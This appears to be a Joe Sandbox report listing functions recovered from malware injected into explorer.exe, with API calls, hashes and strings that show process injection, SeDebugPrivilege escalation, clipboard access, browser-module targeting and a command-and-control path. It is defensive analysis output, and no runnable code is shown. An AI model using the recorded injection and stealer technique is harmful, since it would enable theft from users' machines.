                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 221814145-0
                                                                                                                                                                                                  • Opcode ID: 2bc20813d10902d03f9adf3a655504633a2f6827465e560e1165a8385970e71d
                                                                                                                                                                                                  • Instruction ID: b7469f5e28d49d23f33a53b5b9110dff08b487609421a813625e8f57eea5765a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2bc20813d10902d03f9adf3a655504633a2f6827465e560e1165a8385970e71d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90E06D79712B01C3FF69BBB518927EA1448BB88311F4C35389E19593C1DE2CA4EF96A4
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileProcess$CreateMemoryWrite$AllocCloseContextHandleReadSizeThreadVirtualmalloc
                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                  • API String ID: 596952117-2766056989
                                                                                                                                                                                                  • Opcode ID: 002aa25899cd2985f37c60500266a51d3d14f0eecc427be1b9de0b05803810f3
                                                                                                                                                                                                  • Instruction ID: 311a401f4b4f9b5cae29299fbbde2b2b9b2596a37804f530a20350e4ad2a288f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 002aa25899cd2985f37c60500266a51d3d14f0eecc427be1b9de0b05803810f3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F81473A705F818AEB60CF62E894B9EB7A4F788B98F400215DE8D57B58DF78C155CB00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Handle$Close$Process$AddressAllocCreateMemoryModuleOpenProcRemoteThreadVirtualWrite
                                                                                                                                                                                                  • String ID: @$LoadLibraryA$kernel32.dll
                                                                                                                                                                                                  • API String ID: 752146563-1829755052
                                                                                                                                                                                                  • Opcode ID: c606fb0cfecfd46298193f33cbc6d7605fb5d133aeb872935ca65d1741d69029
                                                                                                                                                                                                  • Instruction ID: 71412cdb9c13e75d614172b9bf89c0773ac7d19e1f4d1534e600a8357fa11358
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c606fb0cfecfd46298193f33cbc6d7605fb5d133aeb872935ca65d1741d69029
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50319D39706F5082FA18CF56AC14B5AA7A0BBC9FC1F540225DE4E57BA4DF7CD2898B00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • malloc.LIBCMT ref: 0AFF0C78
                                                                                                                                                                                                    • Part of subcall function 0B00CC0C: _FF_MSGBANNER.LIBCMT ref: 0B00CC3C
                                                                                                                                                                                                    • Part of subcall function 0B00CC0C: _NMSG_WRITE.LIBCMT ref: 0B00CC46
                                                                                                                                                                                                    • Part of subcall function 0B00CC0C: _callnewh.LIBCMT ref: 0B00CC7A
                                                                                                                                                                                                    • Part of subcall function 0B00CC0C: _errno.LIBCMT ref: 0B00CC85
                                                                                                                                                                                                    • Part of subcall function 0B00CC0C: _errno.LIBCMT ref: 0B00CC90
                                                                                                                                                                                                  • free.LIBCMT ref: 0AFF1020
                                                                                                                                                                                                  • free.LIBCMT ref: 0AFF1028
                                                                                                                                                                                                    • Part of subcall function 0B00CBCC: _errno.LIBCMT ref: 0B00CBEC
                                                                                                                                                                                                  • free.LIBCMT ref: 0AFF1030
                                                                                                                                                                                                  • free.LIBCMT ref: 0AFF1039
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3861811657.000000000AFF0000.00000020.00000001.00020000.00000000.sdmp, Offset: 0AFF0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_aff0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free$_errno$_callnewhmalloc
                                                                                                                                                                                                  • String ID: TerminateProcess$ThreadEx$connect$ket$owA$recv$socket$ueKey$yname
                                                                                                                                                                                                  • API String ID: 2761444284-2795165351
                                                                                                                                                                                                  • Opcode ID: 64aa8e0c970a38ad80d7984744cea5c98d49862ca774bc6d0b56d083bfff6d70
                                                                                                                                                                                                  • Instruction ID: e2427173b1b80abafabdabbb07d3ecbda4cc11012b6f399e4c1e761ca8c2a3af
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 64aa8e0c970a38ad80d7984744cea5c98d49862ca774bc6d0b56d083bfff6d70
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31C16036614B468AEB14DF26F89439E77A1F789B88F404525DE4E57B28DF3CD149CB00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 0C5B32C6
                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32 ref: 0C5B32D9
                                                                                                                                                                                                  • LookupPrivilegeValueA.ADVAPI32 ref: 0C5B32FD
                                                                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 0C5B3320
                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 0C5B332B
                                                                                                                                                                                                  • OpenProcess.KERNEL32 ref: 0C5B333B
                                                                                                                                                                                                    • Part of subcall function 0C5B3070: OpenProcess.KERNEL32 ref: 0C5B3099
                                                                                                                                                                                                    • Part of subcall function 0C5B3070: CloseHandle.KERNEL32 ref: 0C5B30C1
                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 0C5B3378
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CloseHandleOpen$Token$AdjustCurrentLookupPrivilegePrivilegesValue
                                                                                                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                                                                                                  • API String ID: 2357999848-2896544425
                                                                                                                                                                                                  • Opcode ID: 3e1794ce5c283809690fd73b686d53534d5110c0664976bed178a9703c3a7d90
                                                                                                                                                                                                  • Instruction ID: ec7e7a83a748f8c6cd2bf3bf63f7eb9686464ba809a6cdbb11469eaae2bdd5ae
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e1794ce5c283809690fd73b686d53534d5110c0664976bed178a9703c3a7d90
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C31C239315B4182FB14CF66BD54BAAABA1FBC8B91F805124EE4A63B64EF78C145C700
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlock
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1677084743-0
                                                                                                                                                                                                  • Opcode ID: 590d7733d11ae7a91e8ba7639a279f2f9a421102dd10d05eb9efafa798fbcb6f
                                                                                                                                                                                                  • Instruction ID: acfcbdeae3292ef2ac213b777f4a3802bebc52e7d3a350c3adfe4bee42852536
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 590d7733d11ae7a91e8ba7639a279f2f9a421102dd10d05eb9efafa798fbcb6f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06012C39605E41C6FB18AB62EC5879E6761F788FC2F044239DA4A17764DF3CD58AC344
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Virtual$AllocCreateMemoryProcessProtectRemoteThreadWrite
                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                  • API String ID: 1113946311-2766056989
                                                                                                                                                                                                  • Opcode ID: 8eb206c392a85df2eb979af2c9fbee192db5162bc83d91a198319fe8a4d3cb7b
                                                                                                                                                                                                  • Instruction ID: b9ca0df686046e1ae8d9b73030fa852ca4c6e4fa732487ca1db6df66fb3c1bed
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8eb206c392a85df2eb979af2c9fbee192db5162bc83d91a198319fe8a4d3cb7b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F217E76306F8182DB29CF57B951B6ABAB5F788BC0F544129DE8D63B14DB38C1458B00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1006321803-0
                                                                                                                                                                                                  • Opcode ID: 16fbe9a811f8a39130425ac033a9b8a784b63399614c7c978694cb26c5d01716
                                                                                                                                                                                                  • Instruction ID: 05018c86768bb9d58f2d2de855bde00e69f1a2adf0eddbd6a1ec419439fa0cf6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16fbe9a811f8a39130425ac033a9b8a784b63399614c7c978694cb26c5d01716
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A001B17A705B4182EE489B56BD847295351BB88FC1F085138DD1E07B54DF3CD186C700
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                  • Instruction ID: 33f440db8dcf76ed1806d7bd443262935e64228566635c654bb1f16f699d93a5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memcpy$malloc$realloc$free$CriticalSectionlstrlen$EnterLeavewsprintf
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 812771569-0
                                                                                                                                                                                                  • Opcode ID: f25c02b34214fed0755ed42246cc6103518449fe10e9393398946924300546bd
                                                                                                                                                                                                  • Instruction ID: 4fe3170a733796b46c8fa092042b9f8ea2d629ec47a4df2e6f5803d5f922b0ac
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f25c02b34214fed0755ed42246cc6103518449fe10e9393398946924300546bd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2DE17F39301B09CBEB24DBA6E8D476A7BA1F784B85F04062DCA4A47B51DF7DE086D740
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free$CriticalSectionmemcpy$Leavemallocstrncmp$Enterlstrlenrealloc
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4124047334-0
                                                                                                                                                                                                  • Opcode ID: af97f736c75256ced67b10d1523ae910871dce2052183ee6b1000db11822190e
                                                                                                                                                                                                  • Instruction ID: 19f0989dd9b270760a86ef7b702a38965bfa28d53b09fa54da8c278559e4f3af
                                                                                                                                                                                                  • Opcode Fuzzy Hash: af97f736c75256ced67b10d1523ae910871dce2052183ee6b1000db11822190e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53711E7C302E04C5FB08AB92EC94B696B61BB86BD2F44463DCD0A477A5DF3DE0868740
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 0C5B9498
                                                                                                                                                                                                  • RtlInitializeCriticalSection.NTDLL ref: 0C5B94A5
                                                                                                                                                                                                  • lstrcpyA.KERNEL32 ref: 0C5B94DA
                                                                                                                                                                                                    • Part of subcall function 0C5BEF20: GetWindowsDirectoryA.KERNEL32 ref: 0C5BEF6C
                                                                                                                                                                                                    • Part of subcall function 0C5BEF20: GetVolumeInformationA.KERNEL32 ref: 0C5BEFB6
                                                                                                                                                                                                    • Part of subcall function 0C5BEF20: wsprintfA.USER32 ref: 0C5BF017
                                                                                                                                                                                                  • lstrcpyA.KERNEL32 ref: 0C5B94FD
                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0C5B950D
                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32 ref: 0C5B95A4
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: send.WS2_32 ref: 0C5B74EC
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: recv.WS2_32 ref: 0C5B7553
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: lstrcmpiA.KERNEL32 ref: 0C5B75B3
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: lstrlenA.KERNEL32 ref: 0C5B75D7
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: StrStrA.SHLWAPI ref: 0C5B75EF
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: lstrcmpiA.KERNEL32 ref: 0C5B760E
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: strtol.MSVCRT ref: 0C5B7626
                                                                                                                                                                                                  • lstrcatA.KERNEL32 ref: 0C5B951D
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: lstrcpyA.KERNEL32 ref: 0C5B731E
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: lstrcatA.KERNEL32 ref: 0C5B732F
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: lstrcatA.KERNEL32 ref: 0C5B7343
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: lstrcatA.KERNEL32 ref: 0C5B7357
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: lstrcatA.KERNEL32 ref: 0C5B7368
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: lstrcatA.KERNEL32 ref: 0C5B737C
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: lstrcatA.KERNEL32 ref: 0C5B739A
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: wsprintfA.USER32 ref: 0C5B73B2
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: lstrcatA.KERNEL32 ref: 0C5B73C6
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: lstrcatA.KERNEL32 ref: 0C5B73DA
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: lstrcatA.KERNEL32 ref: 0C5B7416
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: WSAStartup.WS2_32 ref: 0C5B7426
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: socket.WS2_32 ref: 0C5B7442
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: gethostbyname.WS2_32 ref: 0C5B7459
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: memcpy.MSVCRT ref: 0C5B7479
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: htons.WS2_32 ref: 0C5B7488
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: connect.WS2_32 ref: 0C5B749F
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: lstrlenA.KERNEL32 ref: 0C5B74B5
                                                                                                                                                                                                    • Part of subcall function 0C5B72C0: send.WS2_32 ref: 0C5B74CB
                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0C5B95BC
                                                                                                                                                                                                  • lstrlenA.KERNEL32 ref: 0C5B95CA
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrcat$CriticalSectionlstrcpylstrlen$lstrcmpimemcpysendwsprintf$DirectoryEnterInformationInitializeLeaveStartupVolumeWindowsconnectgethostbynamehtonsrecvsocketstrtol
                                                                                                                                                                                                  • String ID: /VzCAHn.php?A629855EB2A22925382193$A629855EB2A22925382193
                                                                                                                                                                                                  • API String ID: 3667244998-2780494505
                                                                                                                                                                                                  • Opcode ID: 027bb0a9ce3b6c427593c51076e47950a92822b6eebffa623c4782179a7d58f5
                                                                                                                                                                                                  • Instruction ID: bcaf545c6bf39b5ba9435d58c09700c0bbd072d04d978662b6aaf877714f9697
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 027bb0a9ce3b6c427593c51076e47950a92822b6eebffa623c4782179a7d58f5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C251093A205E45C5FB14DB26EC5079E77A4F798782F440229DA8D87764DF39D18ACB80
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4099253644-0
                                                                                                                                                                                                  • Opcode ID: 2d90a7128c807d89a1f1bf2d6a1705930a541b5f23501c4a4c89efbf8c4cbf5a
                                                                                                                                                                                                  • Instruction ID: 68bdc6571570f5284cbedb4925b2a45f30a6d32ada8ca84858d5718f8d29ec5e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2d90a7128c807d89a1f1bf2d6a1705930a541b5f23501c4a4c89efbf8c4cbf5a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A31F13D302F4689FE1C9B99ED90B692360BBC8B51F1C0739D91A462D0DF7CD09A8302
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3861811657.000000000AFF0000.00000020.00000001.00020000.00000000.sdmp, Offset: 0AFF0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_aff0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free$_malloc_crtmalloc
                                                                                                                                                                                                  • String ID: ENL$ENS$PTB
                                                                                                                                                                                                  • API String ID: 2027218043-1347060993
                                                                                                                                                                                                  • Opcode ID: b19ed15293e8830170cdd68888e8d600795c7cfa9d28dacc6cf5a1aff8321b23
                                                                                                                                                                                                  • Instruction ID: c371ac2a0bd04c6ccd0b20ac4b65fdde9e6181987551800ac8eafcc41ac38ed7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b19ed15293e8830170cdd68888e8d600795c7cfa9d28dacc6cf5a1aff8321b23
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A651B136301B0197EB2CDF26E99135A73A4F788BA8F444A25DF5D07B60EF38C1A68744
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0C5CA2C0: RtlInitializeCriticalSection.NTDLL ref: 0C5CA2F1
                                                                                                                                                                                                    • Part of subcall function 0C5CA2C0: RtlInitializeCriticalSection.NTDLL ref: 0C5CA2FE
                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32 ref: 0C5C9A20
                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32 ref: 0C5C9A3A
                                                                                                                                                                                                  • malloc.MSVCRT ref: 0C5C9A5F
                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 0C5C9ABA
                                                                                                                                                                                                  • free.MSVCRT ref: 0C5C9AC3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CriticalHandleInitializeModuleSection$CloseFileNamefreemalloc
                                                                                                                                                                                                  • String ID: .text$browser.dll$chrome.dll$msedge.dll$opera-browser.dll
                                                                                                                                                                                                  • API String ID: 308684148-2401417439
                                                                                                                                                                                                  • Opcode ID: f4d4cab3f099be543efe84867a689d64e1ea9ecdae0880032a623145d8422e52
                                                                                                                                                                                                  • Instruction ID: 5feb27dd65005d141ab0ac6a99aaca2787281df80fb2ee1452e11bcc1e8aa7a2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f4d4cab3f099be543efe84867a689d64e1ea9ecdae0880032a623145d8422e52
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F951A139305F86C9FB24DF52AC907EA77A4F7C8B81F985229CA4A83654DF78D249C740
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memcpy$lstrlen$freemallocmemsetwsprintf
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1433255627-0
                                                                                                                                                                                                  • Opcode ID: 3f3358fd89c591a3de3c16bc1bf2fc07c1258d1414ea3b73042baff42daefdb3
                                                                                                                                                                                                  • Instruction ID: 5b9782b53ca203823b2aecb47aec5e2bc429fac9a3e657ebb24e3f1bd84c220b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3f3358fd89c591a3de3c16bc1bf2fc07c1258d1414ea3b73042baff42daefdb3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D051CD7A305F848AEB28DF56EC8479A73A0FB88BC5F445129CE4A43758EF3CE5458B00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0C5B4A00: isdigit.MSVCRT ref: 0C5B4A27
                                                                                                                                                                                                  • tolower.MSVCRT ref: 0C5B48B8
                                                                                                                                                                                                    • Part of subcall function 0C5B46A0: malloc.MSVCRT ref: 0C5B46B0
                                                                                                                                                                                                    • Part of subcall function 0C5B46A0: free.MSVCRT ref: 0C5B46D0
                                                                                                                                                                                                  • memcpy.MSVCRT ref: 0C5B4939
                                                                                                                                                                                                  • _errno.MSVCRT ref: 0C5B493F
                                                                                                                                                                                                  • strtod.MSVCRT ref: 0C5B495D
                                                                                                                                                                                                  • _errno.MSVCRT ref: 0C5B49BA
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _errno$freeisdigitmallocmemcpystrtodtolower
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3554981057-0
                                                                                                                                                                                                  • Opcode ID: 07103d640e9ae0411e88654100c8d00ff39fa55492868884b46740f3bc85c165
                                                                                                                                                                                                  • Instruction ID: 744c59f0abfe893a133b88d9ac7327011e49d0418cd0b685767693524f0d1ecc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 07103d640e9ae0411e88654100c8d00ff39fa55492868884b46740f3bc85c165
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A641C43A604B64C6EB25DF22E84476D7BA1F384B81F418226EE4553756EF3CD085CB40
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3861811657.000000000AFF0000.00000020.00000001.00020000.00000000.sdmp, Offset: 0AFF0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_aff0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free$_errno
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2288870239-0
                                                                                                                                                                                                  • Opcode ID: 2e91f14760ca50965f451ad78aef7bb371f62a1693b0c48b09e2edaf0265d003
                                                                                                                                                                                                  • Instruction ID: 923023d013664a3626d041e59b0ed49f1a0762f051a70d861ec6e9261d6df306
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e91f14760ca50965f451ad78aef7bb371f62a1693b0c48b09e2edaf0265d003
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EA312E22621B0586FE6C9B11E89937A33E8FB98F50F089B55E95E062A0EF7CC1C5C315
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 0C5D4582
                                                                                                                                                                                                  • RaiseException.KERNEL32 ref: 0C5D45AB
                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 0C5D460C
                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0C5D455F
                                                                                                                                                                                                    • Part of subcall function 0C5D24AC: _getptd_noexit.LIBCMT ref: 0C5D24B2
                                                                                                                                                                                                    • Part of subcall function 0C5D24AC: _amsg_exit.LIBCMT ref: 0C5D24C2
                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0C5D4611
                                                                                                                                                                                                  • _getptd.LIBCMT ref: 0C5D461D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0C5B0000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_c5b0000_explorer.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Exception_getptd$DestructObject$Raise_amsg_exit_getptd_noexit
                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                  • API String ID: 1037122555-1018135373
